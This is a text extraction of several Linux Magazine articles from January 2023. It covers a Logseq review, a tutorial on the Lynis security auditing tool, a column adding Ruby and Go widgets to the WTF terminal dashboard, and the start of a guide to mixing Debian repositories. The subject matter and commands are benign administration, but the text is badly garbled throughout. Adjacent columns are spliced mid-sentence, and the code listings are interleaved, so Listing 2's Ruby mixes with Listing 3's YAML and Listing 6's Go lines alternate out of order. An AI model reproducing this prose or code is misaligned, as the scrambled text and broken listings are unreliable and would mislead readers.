needed. In the Settings menu (accessed While writing, you can format the text panded, and collapsed (Figure 6).
by clicking on the ellipsis icon in the with Markdown immediately. After Logseq also lets you include links to
main panel), you can set editor prefer- pressing the Enter key, you immediately PDF documents. Clicking on a link
ences (Figure 3), choose a light or dark see the formatted results in the same opens the document in a separate win-
page background, enable Logseq’s ex- window and not in a separate one like dow and lets you highlight text passages,
perimental encryption feature, or link many Markdown apps. Each time you which the program then adopts as refer-
Logseq to Zotero, among other options. press Enter, the editor creates a new bul- ences in the notes. If you click on a refer-
From the left sidebar (accessed by let point, which you can tab in as ence of this type, the PDF then opens at
clicking on the hamburger menu), you needed. A bullet point with text is that location.
can navigate between Journals, known as a Block in Logseq. Pressing
Linking Content
Perhaps you have created thousands of
notes over the years. Navigating through
them can be difficult. Logseq does not
follow the top-down design principle
when working with folders; instead it
uses a bottom-up design [11] in the form
of graphs.
Logseq supports you by automatically
creating graphs that ressemble mind
maps [12]. These graphs work along
similar lines as the human brain, where
categories are created by linking syn-
apses. As a result, the more often an
entry is linked to others by backlinks or
hashtags, the more prominently the
entry is displayed in the graph. A graph
also helps to see which pages are not
linked but would benefit from a link.
The usefulness of these graphs increases
Figure 4: Logseq supports flash cards for revising content. You can cre- with the number of entries and links
ate cards from scratch or extract them from previously created blocks. (Figure 7).

42 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
Logseq

You can also search at the word level. months in parallel to my long-time favor- its secrets. The documentation, FAQ, and
To do this, either use the search mask ite local wiki Zim, and I still feel very an option for defining keyboard short-
(Ctrl+K) or hold down the Shift key and much like a Logseq novice. It takes a few cuts are all hidden behind the Help link
click on the title of a page in the sidebar months of use for Logseq to fully reveal at the top of the right sidebar.
or a linked term in an entry. The respec-
tive page with its links then appears in
the right sidebar.
Linking with square brackets or
hashtags in Logseq proves to be a pow-
erful tool. To create connections, create a
new bullet point in an entry and type the
title of an existing or yet-to-be-created
page in double square brackets. Depend-
ing on your preference, you can use a
hashtag instead to create the link. Back-
links or hashtags form the links in the
graph.

Learning Curve
Logseq may seem a little confusing at
first until you find your workflow –
sometimes this takes several tries. I
start each morning with a journal entry
that summarizes the day’s tasks. It has
a header of Tasks in double square
brackets, which means that it can be
linked to an existing page on the topic,
or I can create a new page with that Figure 5: A Git-style feature supports versioning and reverting to previ-
name. If I then click on the Tasks page, ous versions of the entry.
I will see a continuous list of daily
tasks with their respective dates. Com-
bining this with the to-do function, I
quickly have an overview of what I
have done and what I still need to
work on.
This work approach saves a great
deal of time, because you can work
with shortcuts instead of folders. You
don’t have to think about where to
store entries or how useful a heading
is: The meaning is derived from the
links. You can write about a wide vari-
ety of topics in a daily journal entry
and then link them meaningfully to
other pages that already exist or you
plan to create.
As a result, you generally don’t have
to worry about finding entries in Log-
seq. However, if you want to use graphs
productively, you should think about a
sensible structure in advance and test
it. When doing so, start by looking at
the Graph view from the left sidebar
after making changes to the entries and
then decide if this makes sense for your
use case. Figure 6: Right-clicking on a block’s bullet point opens a list of format-
In this article, I can only hope to pres- ting options. You can color code the block, convert it to a template,
ent a fraction of Logseq’s feature set. I open the entry in the sidebar, copy its references, or create a flashcard
have only been using Logseq for two with its content.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 43

IN-DEPTH
Logseq

Info
[1] Evernote Linux:
https://evernote.com/earlyaccess
[2] Logseq:
https://github.com/logseq/logseq
[3] Roam Research:
https://roamresearch.com/
[4] Notion: https://en.wikipedia.org/wiki/
Notion_(productivity_software)
[5] Org mode:
https://en.wikipedia.org/wiki/
Org-mode
[6] TiddlyWiki: https://tiddlywiki.com
[7] Excalidraw: https://github.com/
excalidraw/excalidraw
[8] Zotero:
https://en.wikipedia.org/wiki/Zotero
[9] Electron: https://en.wikipedia.org/wiki/
Electron_(software_framework)
[10] FUSE for AppImage:
https://github.com/AppImage/
Figure 7: The Graph view visualizes the links between pages and jour-
AppImageKit/wiki/FUSE
nal entries.
[11] Bottom up:
Conclusions https://en.wikipedia.org/wiki/
things better, such as PDF integra-
Top-down_and_bottom-up_design
Logseq’s reception in the open source tion. Although the application is still
community is evident from the 120 or in the beta phase, the software’s po- [12] Mind map:
so contributors on GitHub and a Dis- tential is already becoming apparent. https://en.wikipedia.org/wiki/Mindmap
cord chat with 1,300 active participants An Android app is in the testing [13] Data privacy:
at the time of testing. phase and can be found as an APK on https://logseq.com/blog/privacy-policy
The only negative point I noticed in the GitHub page. A Pro version of [14] Donating to Logseq:
testing is that Logseq collects teleme- Logseq with synchronization is in https://opencollective.com/logseq
try data without asking the user. If in the planning stage. The developers
doubt, you may want to check out the just received about $4 million in Author
relatively brief privacy policy [13]. venture capital, but you can also Ferdinand Thommes lives and works as a
Logseq has gleaned many features support Logseq by donating on Linux developer, freelance writer, and tour
from Roam Research and made some OpenCollective [14]. Q Q Q guide in Berlin.

QQQ

44 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

IN-DEPTH
Lynis

Security audits with Lynis

Professional
Hardening
The complexity of modern distributions offers many potential attack vectors for malware.
Lynis lets you find these vulnerabilities before an attacker does. By Erik Bärwaldt

V
irtually nobody uses a computer approach because you will always find on the intranet. The self-hosted Enter-
without Internet access. Unfor- the latest version there [2]. CISOfy (lo- prise variant also includes all of the ad-
tunately, the network of net- cated in Vlijmen, Netherlands) offers the ditional packages and is suitable for ser-
works is teeming with malicious community variant of Lynis free of vices that provide security audits for
programs that exploit vulnerabilities in charge. The download contains the actual other companies [3].
operating systems, firmware, and appli- application, but some additional pro-
cation programs looking to inject mal- grams and the Collector are missing. At Your Command
ware or steal personal data. Lynis comes with some community pl- You will find detailed instructions for in-
Sys admins protect their systems ugins out of the box. stalling the Lynis community variant on
against these attacks as part of their various distributions [4] on the CISOfy
daily grind. Home users also need to Lynis Enterprise website. You then execute the program
protect their systems by keeping their For companies that need to monitor by typing lynis <parameter> in a termi-
computers up to date and running an oc- more than 10 workstations, CISOfy offers nal window. To access the available
casional security scan to detect any vul- Lynis Enterprise, which is available as a command parameters, type lynis show.
nerabilities. Lynis [1], a free software software as a service (SaaS, a licensing The central command for auditing the
tool from CISOfy, covers a wide range of and sales model where the provider op- local system is lynis audit system. The
problem scenarios and lets you perform erates software on their own infrastruc- application now runs over 200 test pa-
regular system checks in no time at all. ture and offers a subscription model for rameters and displays the results in a
use). Lynis Enterprise comes with nu- simple table after a short wait (Figure
First Launch merous plugins and additionally gener- 1). To the right of each test category,
Lynis, a command-line program, comes ates web-based reports in line with vari- the results appear in green, yellow, or
with a collection of scripts for Unix- ous standards. The Enterprise variant red. If the results are displayed in yel-
style systems. These scripts check vari- also lets you check Docker files in con- low, you need to check the setting, but
ous vulnerable system components for tainer environments and monitor remote if the text color is red, you will want to
insecure settings and display color- computer systems. reconfigure the service in question.
Photo by FLY:D on Unsplash

coded results. CISOfy offers the SaaS version of Lynis Lynis grays out components that are not
You will find Lynis in the repositories of Enterprise as a subscription for $3 per available on the system, provided that
many distributions and can install it using month. For larger organizations that re- their absence does not affect the secu-
any of the popular package management quire monitoring of more than 100 work- rity of the system as a whole.
tools. You also can download Lynis from stations, a self-hosted package is avail- The individual tests are divided into
the CISOfy website. I recommend this able for setting up a local Lynis instance categories. If you launch the software as a

46 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
Lynis

normal user, Lynis skips some checks

that can only be executed if you are root.
The program outputs messages to point
out the skipped test routines. After the
test results, Lynis also displays a harden-
ing index and shows potential for im-
provement. Lynis makes suggestions
based on the individual test categories on
how you can upgrade problematic set-
tings to improve your system’s security.
You can open these tips by following the
links in your web browser (Figure 2).

Logger
Lynis generates multiple logs. Besides a
profile containing the respective test sce-
nario, it generates a logfile and a report.
Lynis shows you the search paths for the
individual files after starting the tests.
The report is the most important of
these files. It not only contains a detailed
list of all loaded kernel modules, data on
the network interfaces, and the directory
structures, but it also includes all of the
installed packages, cron jobs, and the
tests that have been run. These do not
appear in plain text like in the program
output, but with their internal designa-
tions. Lynis also outputs detailed infor-
mation about the services loaded by the Figure 1: Lynis displays the color-coded test results in groups on the
init system. terminal.
The report also contains several sug-
gestions on how to harden the current
system against attacks. However, these
suggestions are somewhat cluttered and
unstructured in the report. The sugges-
tion tag at the beginning of each line
marks the individual suggestions.

Profiles
Lynis supports the use of different pro-
files. You can view a list of all existing
profiles with lynis show profiles. The
preset profile uses all available options.
If you only want to test certain compo-
nents or services, you can create an ad-
ditional profile for this purpose. There
are no restrictions on the number of
profiles.
The profiles are simple text files,
which can be managed with any text ed-
itor. However, be careful not to modify
the original profile. To use a specific pro-
file during a test run, specify its name as
an option when calling Lynis. To per-
form a test run with a specific profile,
type the following at the prompt:
Figure 2: Lynis suggests potential improvements to the configuration in
lynis audit --profile <profile> the form of URLs (shown in gray).

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 47

IN-DEPTH
Lynis

When you assign names to new profiles option to use the --upload parameter to the existing logs on each new run with-
that you generate from the default profile send the report to their own Lynis in- out further ado.
as a template, you should include the stance for auditing and documentation
components to be tested in the name. purposes [5]. Add-Ons
For example, you can create specific pro- Thanks to its modular structure, Lynis
files for different installations, but also Color Scheme can easily be extended with plugins to
group different server services, such as When you run Lynis, depending on the help you retrieve additional data from
web or mail servers, into separate pro- background color selected, the contrast the systems you scan. Because Lynis’s
files. The security level can also be taken of the console output can be too low, check routines consist of shell scripts,
into account in individual profiles. making the results difficult to read. To savvy administrators have the option of
avoid this, start the application using the writing any plugins they need them-
Regular Scanning --reverse-colors parameter. This tells selves. The developers provide detailed
Especially in a corporate environment, the tool to adapt the output to light ter- instructions for this [6].
you will want to run security scans regu- minal backgrounds. Color highlighting Provided the plugins are explicitly en-
larly. A cron job gives you the ability to can also be turned off completely with abled in the individual profiles, Lynis
run Lynis at fixed intervals. To do this, the parameter --no-colors (Figure 3). automatically processes any plugins you
the application offers the --cronjob call add during scans. By default, these ex-
parameter, which does a complete scan Problems tensions reside in the /usr/share/lynis/
of the system. You also need to generate By default, Lynis always saves the re- plugins/ directory. During a test run,
a matching script and create the associ- ports it generates in the /var/log/ direc- they can be called at two phases; the re-
ated paths to be able to save the report. tory, creating the lynis.log and ly- sults are displayed on the standard out-
Automated tests will then run at regu- nis-report.dat files. If you need the test put and stored in the report file.
lar intervals without any user interac- reports for documentation purposes CISOfy also maintains a database of
tion. The software also removes all spe- over the long term, you should copy plugins that can be individually down-
cial characters from the report to facili- them to a separate data carrier or to an- loaded and integrated into a Lynis instal-
tate processing downstream. Users of other directory immediately after the lation. However, to access these exten-
the Enterprise variant also have the test run. Otherwise, Lynis overwrites sions, you first need to register with the
provider and be an Enterprise customer.

Conclusions
Lynis is a powerful tool for finding vul-
nerabilities on computer systems. The
Community version is suitable for home
users and admins with a manageable
number of computers, while the Enter-
prise version is recommended for larger
installations. The Enterprise version also
comes with additional features, such as
a web-based control panel and plugins
that let you check file integrity. With the
help of an extension for pentesting,
Lynis is also suitable for playing out at-
tack scenarios like the ones that occur in
real life. Every security-conscious user
should have Lynis in their toolbox. Q Q Q

Info
[1] Lynis: https://cisofy.com/lynis/
[2] Lynis download:
https://cisofy.com/downloads/lynis/
[3] Variants: https://cisofy.com/pricing/
[4] Installation instructions: https://cisofy.
com/documentation/lynis/get-started/
[5] Cron jobs:
https://cisofy.com/documentation/
lynis/configuration/#lynis-cronjob
[6] Create your own plugins:
Figure 3: Lynis lets you customize the colors in the text output, includ- https://cisofy.com/documentation/
ing turning off the color highlighting. lynis/plugins/development/

48 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

IN-DEPTH
Programming Snapshot – Terminal Dashboard

Customizing the WTF

dashboard tool

At a
Glance
Using extensions in Go and Ruby, Mike Schilli
adapts the WTF terminal dashboard tool to
meet his personal needs. By Mike Schilli

I
actually wanted to write a terminal extended with new widgets. Huz-
user interface (UI) for this issue that zah, I’ll just jump on the WTF
would show me important data re- bandwagon this time!
lating to the system status and world To talk the terminal dashboard
events using widgets. But what a shock WTF into filling its tiles with
when I saw online that there is already various widgets, as shown in Figure 1, various
an open source tool named WTF [1] (or you first need to drop the compiled wt- tiles. When done, call
wtfutil, as it was originally called) that futil Go program into a bin directory wtf on the command line to marvel at
has been able to do all this for a long as wtf and configure a YAML file with the tiles freshly filled with content in
time. Written in Go, WTF can be easily the individual WTF modules in the your terminal.

Lead Image © bowie15, 123RF.com

Figure 1: A fully configured installation of the WTF terminal dashboard (Source: GitHub).
© Chris Cummer, https://wtfutil.com

50 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
Programming Snapshot – Terminal Dashboard

You’ll find installation instructions for row and column indexes to 0, with a Go path below ~/go/bin/p0d after a
the tool on a wide variety of operating widget height and width of 1. while. You can convert this to an execut-
systems on GitHub, but ultimately all The sizes and positions of tiles in WTF able path for later use.
that is needed on Linux is a git clone of are determined by the global tile width Called at the command line, p0d clut-
the repository followed by make build in and height in the grid section, which is ters the terminal with ASCII art and
the newly created subdirectory. Then, measured in terminal characters. A wid- wildly incrementing counters (Figure 4).
watch the Go compiler fetch all the de- get’s position is then set by reference to I don’t want that in my widget, so the
pendent libraries from GitHub and bun- the offset of a tile in the horizontal (left wrapper script from Listing 2, written in
dle the whole thing into a binary in bin/ to right) and the vertical (top to bottom) Ruby, calls p0d but intercepts the output
wtfutil/ (Figure 2). position. For example, if you initially di- and focuses only on the JSON file cre-
By the way, if you think go build vided the terminal into four columns ated (thanks to the -O option), which
would be a good idea, you will find and two rows, top=0 left=0 addresses contains some key data with the results
out that you are wrong shortly before the top left tile and top=1 left=3 ad- from the bandwidth measurement.
the end of the compilation, because go dresses the bottom right tile. Tiles can The shortest configurable runtime for
build instructs Go to store the result- occupy more space than just a column p0d seems to be three seconds; by de-
ing binary in a file named wtf – but or row, depending on their individual fault, it goes on for 10 seconds. This is
there is already a directory of that width and height settings, defining multi- why line 7 of Listing 2 sets a value of 3
name in the repository, and alarm ples of the base unit. in the third parameter to the call for Ru-
bells go off instead. The makefile, on Figure 3 shows the terminal after in- by’s external command executor
the other hand, ensures that the gener- voking WTF with the ~/.config/wtf/con- popen3() from the Open3 package. The
ated binary is named wtfutil and ends fig.yml configuration file from Listing 1.
up in the bin/ directory without any Just as the doctor ordered: The upper Listing 1: config.yml
collisions. left tile shows my current IPv4 address wtf:
and the geolocation in my adopted colors:
Tool Belt at the Ready hometown, San Francisco. A nice, useful
background: black
WTF already comes with a well-filled standard widget – but now it’s time to
border:
tool belt of predefined widgets that only expand WTF with my creations.
focusable: darkslateblue
need to be activated if required. For ex-
focused: orange
ample, I quite liked the ipinfo widget Script One, Two, Three
normal: gray
because my computer’s official IP ad- Next up is a widget that measures the
grid:
dress frequently changes due to all speed at which my Internet provider
columns: [32, 32, 32]
kinds of VPN configurations. It is help- moves data in and out over my home
ful to know what the Internet services I line. Precisely measuring the available rows: [10, 10, 10]

am using are thinking in terms of my bandwidth in both directions in mega- refreshInterval: 1

geographic location. bits per second (Mbps) is no trivial task, mods:

The YAML configuration from List- but luckily there’s already a tool for that ipinfo:

ing 1 drops the ipinfo module onto the on GitHub, called p0d [2]. p0d is written colors:
dashboard. The settings enable WTF’s in Go, and the repo can simply be cloned name: "lightblue"
internally-defined ipinfo module. For the and compiled from source. Following the value: "white"
widget to land in the top left corner of go install command gleaned from the enabled: true
the terminal, the mods section sets the readme, the p0d binary lands in the local position:

top: 0

left: 0

height: 1

width: 1

refreshInterval: 150

Figure 3: The standard ipinfo

module displays the geolocation
Figure 2: A make build retrieves half of GitHub as source code. of the current WAN IP.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 51

IN-DEPTH
Programming Snapshot – Terminal Dashboard

JSON data is output to the temporary file starting in line 14. The first sub-array nonsensical number of decimal places
previously created in line 5. (index 0) below the OS key contains the in the keys InetUlSpeedMBits and Inet-
After error checking, the Ruby script two Mbps values I’m looking for, rep- DlSpeedMBits. Ruby’s to_i() string-to-
then rewinds the generated Tempfile to resenting the upload and download integer converter rounds these values
the beginning in line 13, and the JSON speeds. They are returned by p0d as meaningfully to the nearest integer
parser uses parse() to parse the data floating-point numbers with a (lines 17 and 18).
The settings in Listing 3 add the
wrapped tool to the WTF configuration
as a widget in config.yml. Because WTF
does not inherently support p0d, the
type: "cmdrunner" directive specifies that
the widget expects a command-line ar-
gument with parameters, which it then
executes. The widget collects the stan-
dard output and copies it onto the tile on
the dashboard. Figure 5 shows the new
widget in action, below the IP widget
that I described earlier. The dashboard
now has two useful dials, but there is
enough space for a few more, so what’s
next?

Figure 4: Called from the command line, p0d quickly fills the terminal
with output.

Listing 2: p0d-runner Figure 5: With the Internet speed-

01 #!/usr/bin/ruby
ometer, the dashboard now has
02 require 'open3'
two widgets.
03 require 'tempfile'

04 require 'json'
Listing 3: p0d Widget Definition
p0d:
05 out = Tempfile.new('p0d')

06 stdin, stdout, stderr, wait_thr = args: [""]

07 Open3.popen3("p0d", "-d", "3", "-O", out.path, "https://netflix.com") cmd: "p0d-runner"

08 stdin.close colors:

09 if wait_thr.value.exitstatus != 0 name: "lightblue"

10 puts stderr.read value: "white"

11 exit enabled: true

12 end position:

13 out.rewind top: 1

14 data = JSON.parse(out.read) left: 0

15 printf("Internet Speed:\n"); height: 1

16 os = data[0]["OS"] width: 1
17 printf("Download: %d mbits/sec\n", os['InetDlSpeedMBits'].to_i); refreshInterval: 600
18 printf("Upload: %d mbits/sec\n", os['InetUlSpeedMBits'].to_i); type: "cmdrunner"

52 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
Programming Snapshot – Terminal Dashboard

DIY
Widgets on the WTF dashboard can do
more than just display dynamically re-
trieved data line-by-line. They also offer
power users the ability to select lines
from the window contents and run ac-
tions on the active line.
The custom widget on the right in Fig-
ure 6 is an example of this. It retrieves a
list of the latest issues of the “Program-
ming Snapshot” column you’re reading
right now. It fetches them from the
world-famous Perlmeister.com portal and
displays their titles and publication
dates. If you select one of the columns in
this widget, it even launches a web
browser to show you this specific issue
from the Linux Magazine website. Let’s
look behind the scenes at this magic. Figure 6: A third window displays the latest “Programming Snapshot”
To interact with a particular widget as columns.
a WTF user, such as in the terminal UI in
Figure 6, type the digit displayed next to
the header (2 for the custom widget in
this case). This tells the UI to focus on
the selected widget. Pressing K and J
subsequently moves the selection (high-
lighted in green) up and down within
the selected widget, just like in the vi ed-
itor. Hidden away in the depths of the
extension’s Go code, each entry has a
URL associated with it. When you press
the Enter key, the widget fires up a web
browser and loads the selected item from
the web (Figure 7).
WTF does not support advanced fea-
tures like this out of the box, but you can
help it out with some Go code. To do
this, you need to clone WTF’s GitHub re-
pository and modify the code. Then re- Figure 7: Items selected in the list are opened in the web browser.
compile with make build to make new
widgets available, such as the snapshot Listing 5: widget_maker.go (Excerpt)
widget created in Listings 5 through 8. package app
The new binary then supports the import (
//...
Listing 4: Snapshot Configuration "github.com/wtfutil/wtf/modules/snapshot"

snapshot: // ...
)
enabled: true
// MakeWidget creates and returns instances of widgets
colors:
func MakeWidget(
rows:
// ...
even: "black" switch moduleConfig.UString("type", moduleName) {
odd: "black" case "snapshot":

position: // ...
settings := snapshot.NewSettingsFromYAML(moduleName, moduleConfig, config)
top: 0
widget = snapshot.NewWidget(tviewApp, redrawChan, pages, settings)
left: 1
// ...
height: 2
}
width: 2 return widget
refreshInterval: 86400 }

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 53

IN-DEPTH
Programming Snapshot – Terminal Dashboard

snapshot widget type, which you can in- ScrollableWidget basic type, as shown in the Widget structure with the required
clude in the YAML configuration as line 10 of Listing 6. This ensures that you content registers the widget with the ren-
shown in Listing 4. can navigate to the widget and browse derer, which later draws it in the termi-
its content. The code in Listing 7 initial- nal UI. Lines 23 to 25 specify the key-
Customized izes the new widget with the YAML con- board functions that make the currently
To do this, Listing 5 first needs to in- figuration data. As a result, the snapshot- selected entry in the widget move up
clude the newly created WTF snapshot specific Widget structure (Listing 6, and down when you press K and J, while
module in the WTF source code of the line 9) can include additional YAML data Enter selects the highlighted entry (along
widget_maker.go file. You will need a afterwards, which is a no-op (no opera- with the default browser action for the
new import statement that drags in the tion) in this case because the widget stored URL).
code from Listing 6, as well as an addi- does not require any additional configu- The Refresh() function starting in
tional case statement that calls the New- ration. In addition to the YAML data, line 28 gets called whenever the terminal
Settings() and NewWidget() functions however, the Widget structure includes UI redraws the widget. Using scrape-
from the Go snapshot package when the internal data in the form of the “Pro- Links() in line 29, it fetches the links for
program is initialized. Listing 6 shows gramming Snapshot” columns fetched current and past “Programming Snap-
what goes on behind the scenes in the from the web, along with their headings shot” columns from the Perlmeister web-
process. You need to copy Listing 6 to and URLs on the Linux Magazine site. site, as detailed below in the web scraper
the modules/snapshot/ directory of the Later on, Listing 8 defines the corre- in Listing 8, and breaks them down for
open source project, along with its sponding Link structure to hold these displaying in a compact format for indi-
counterparts in Listing 7 and Listing 8, values starting in line 11. vidual selection.
before recompiling. The NewWidget() function in Listing 6 Triggered by the Render() command in
The new snapshot widget on the right starting in line 15 creates the new snap- Listing 6, the UI displays the current con-
in Figure 6 is derived from the view. shot widget in the WTF universe. It fills tent of the snapshot widget on the screen.

Listing 6: widget.go
01 package snapshot 28 func (widget *Widget) Refresh() {

02 import ( 29 links, err := scrapeLinks()

03 "fmt" 30 widget.err = err
04 "github.com/gdamore/tcell/v2"
31 widget.links = links
05 "github.com/rivo/tview"
32 widget.SetItemCount(len(widget.links))
06 "github.com/wtfutil/wtf/utils"
33 widget.Render()
07 "github.com/wtfutil/wtf/view"
34 }
08 )
35 func (widget *Widget) Render() {
09 type Widget struct {
36 widget.Redraw(widget.content)
10 view.ScrollableWidget

11 settings *Settings 37 }

12 err error 38 func (widget *Widget) content() (string, string, bool) {

13 links []Link 39 title := "Programmier-Snapshot"

14 } 40 content := ""
15 func NewWidget(tviewApp *tview.Application, redrawChan 41 for idx, link := range widget.links {
chan bool, pages *tview.Pages, settings
42 row := fmt.Sprintf(`[%s]%2d. %s`,
*Settings) *Widget {

16 widget := &Widget{ 43 widget.RowColor(idx), idx+1,

17 ScrollableWidget: view.NewScrollableWidget 44 tview.Escape(link.title),

(tviewApp, redrawChan, pages, settings.Common), 45 )
18 settings: settings,
46 content += utils.HighlightableHelper
19 } (widget.View, row, idx, len(link.title))
20 widget.SetRenderFunction(widget.Render) 47 }
21 widget.InitializeRefreshKeyboardControl(widget.Refresh)
48 return title, content, false
22 widget.InitializeHelpTextKeyboardControl(widget.
49 }
ShowHelp)
50 func (widget *Widget) openLink() {
23 widget.SetKeyboardChar
("j", widget.Next, "Select next item") 51 sel := widget.GetSelected()

24 widget.SetKeyboardChar 52 if sel >= 0 && widget.links != nil && sel < len
("k", widget.Prev, "Select previous item") (widget.links) {
25 widget.SetKeyboardKey
53 url := widget.links[sel].url
(tcell.KeyEnter, widget.openLink, "Open story in
browser") 54 utils.OpenFile(url)

26 return widget 55 }

27 } 56 }

54 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
Programming Snapshot – Terminal Dashboard

The content() function collects the con- actually exist on the Linux Magazine published in the past 25 years on the
tent from line 38. It winds its way through website? To find out, the data grabber Perlmeister.com site. The Go goquery
the “Programming Snapshot” columns in Listing 8 scans the complete list of scraper has an easy task with the sim-
stored in the links instance variable and all “Programming Snapshots” ple HTML of the article links published
inserts them into the rows of the widget
one by one with color highlighting. Listing 7: settings.go
Line 25 defines what happens when package snapshot
you press Enter after selecting a “Pro- import (
gramming Snapshot” column, carried "github.com/olebedev/config"
out by the openLink() function, which "github.com/wtfutil/wtf/cfg"
starts in line 50. Using the index number )
of the entry in question in sel, line 53 re- const (
trieves the URL for the entry, which is defaultFocusable = true
stored in the links data structure, and )
uses utils.OpenFile() to open it. This // Settings contains the settings for the snapshot view
fires up the default web browser and type Settings struct {
tells it to display the contents of the arti- *cfg.Common
cle page on the Linux Magazine website. }
Nothing really exciting is required in // NewSettingsFromYAML creates the settings for this module from a YAML file
the YAML settings of the configuration func NewSettingsFromYAML(name string, ymlConfig *config.Config, globalConfig
file for the snapshot widget; only the *config.Config) *Settings {

standard stuff is processed. The widget snapshot := ymlConfig.UString("snapshot")

does not have its own parameters, so settings := Settings{

Listing 7 only contains boilerplate code. Common: cfg.NewCommonSettingsFromModule

(name, snapshot, defaultFocusable, ymlConfig, globalConfig),

}
Data Hog
return &settings
But how does the widget know which
}
“Programming Snapshot” columns
IN-DEPTH
Programming Snapshot – Terminal Dashboard

under the URL defined in line 18. Its to be displayed in the selection along Info
Find() function goes through all the with the corresponding link to the article [1] WTF:
links in the web document art_eng. on the Linux Magazine website. Based on https://github.com/wtfutil/wtf
html starting in line 34, only keeping this list, the code uses the title fields of [2] p0d:
track of the ones that have an Issues each element to generate the displayed https://github.com/simonmittag/p0d
string in their path. These are typically list. When you press Enter to select an
links to “Programming Snapshot” arti- entry, the code grabs the url attribute of Author
cles on the Linux Magazine site. the entry and brings up the external Mike Schilli works as a
Depending on the value defined in the browser for your reading pleasure. software engineer in the
variable maxHits (line 31), the function San Francisco Bay Area,
California. Each month
collects the URLs of a maximum of five Outlook in his column, which has
articles, extracts the year and issue num- All done! Obviously, however, you can been running since 1997,
ber of the publication from their paths, teach the WTF tool many more new he researches practical
applications of various programming
and appends them to the array of link tricks. It goes without saying that there
languages. If you email him at mschilli@
structures in links. Each entry also fea- are virtually no limits to what creative perlmeister.com he will gladly answer
tures a title field containing the headline programmers can do with this tool. Q Q Q any questions.

Listing 8: goquery.go
01 package snapshot 24 return links, errors.New("Fetch failed")

02 import ( 25 }

03 "errors" 26 doc, err := goquery.NewDocumentFromReader(res.Body)

04 "fmt" 27 if err != nil {

05 "net/http" 28 return links, err

06 "regexp" 29 }

07 "strings" 30

08 "github.com/PuerkitoBio/goquery" 31 var maxHits = 5

09 ) 32 daterx := regexp.MustCompile(`\d{4}/\d{3}`)

10 33

11 type Link struct { 34 doc.Find("a").Each(func(i int, s *goquery.Selection) {

12 title string 35 if maxHits > 0 {

13 url string 36 link, _ := s.Attr("href")

14 } 37 if strings.Contains(link, "Issues") {

15 38 rs := daterx.FindStringSubmatch(link)

16 func scrapeLinks() ([]Link, error) { 39 title := fmt.Sprintf("%s (%s)", s.Text(), rs[0])

17 links := []Link{} 40 links = append(links, Link{title: title, url:

18 res, err := http.Get("https://perlmeister.com/art_eng. link})

html") 41 maxHits--

19 if err != nil { 42 }

20 return links, err 43 }

21 } 44 })

22 defer res.Body.Close() 45 return links, nil

23 if res.StatusCode != 200 { 46 }

QQQ

56 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

IN-DEPTH
Mixing Debian Repositories

Tips for mixing safely

Mixology
A little caution can save you hours of frustrating work (plus, gives the illusion of safety, if you over-
look the additional testing the deriva-
options for mixing gone awry). By Bruce Byfield tives do. Besides, occasionally a bug oc-

D
curs in stable and the quickest fix is in
ebian package repositories are backports and security updates. But set up testing and unstable. For any of these
organized along two axes. The the testing and unstable repositories in- reasons, mixing will happen.
first axis controls the degree of tended primarily for developers, and noth- If you must mix, take the verbosity of
software freedom in the instal- ing is guaranteed. A single careless step, apt-get/apt seriously. In particular, pay
lation. Newly installed, a Debian sys- and you could lose your desktop environ- attention to the dependencies updated
tem includes only packages from the ment, the ability to work with packages, or with testing and unstable packages. As
main section of the repository, which some other basic part of the installation, a rule, the more dependencies or the
contains only free-licensed packages. and find yourself condemned to hours more important the dependencies, the
However, you can enable the contrib of futile efforts to recover. Too often, a greater the risk. If you don’t know what
section, which houses free packages reinstall [1] is the quickest solution. a dependency does, take the time to
that depend on non-free packages, and If any of these misfortunes occur, you learn. The best odds for successful mix-
non-free, which houses packages with have only yourself to blame. The reposi- ing are packages with no dependencies
restrictive licenses, by editing the URLs tory names alone are a warning – espe- or no shared ones. The command
for repositories in /etc/apt/sources. cially if you venture beyond the three
list (Figure 1). Little harm can come basic repositories to others such as the apt-cache rdepends PACKAGENAME
from this editing, and, in fact, it is nec- experimental repository.
essary if you want to use the advanced Still, let’s face it: Users will mix re- will show the other packages that use a
Lead Image © Andrey-Kiselev, 123RF.com

proprietary hardware drivers. The sec- positories despite any warning. Many dependency, indicating the possible ex-
ond axis, though, is another matter. Tin- users crave the latest apps, and while tent of any consequences – although
kered with carelessly, it causes more re- stable may be reliable, it can be several not all packages react the same way
installs than any other aspect of Debian. releases behind the latest applications, (Figure 2). You might also run
This second axis is the main Debian re- especially near the end of the general
positories themselves. By default, a Debian release cycle. Sometimes, that means apt-get---simulate install PACKAGE
system enables only the stable repository. that its apps lack a needed feature. Be-
Stay with stable and you enjoy the full sides, Debian derivatives borrow from or even try a proposed action in a virtual
support of the distribution, including testing and unstable all the time, which machine first. As well, you might use the

58 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 IN-DEPTH
Mixing Debian Repositories

Figure 1: The sources.list file contains the addresses of all repositories used by a Debian system. Note that
the cdrom used to install is disabled by commenting out, and that all three sections of repositories are listed.
Only the stable and testing repositories are listed.

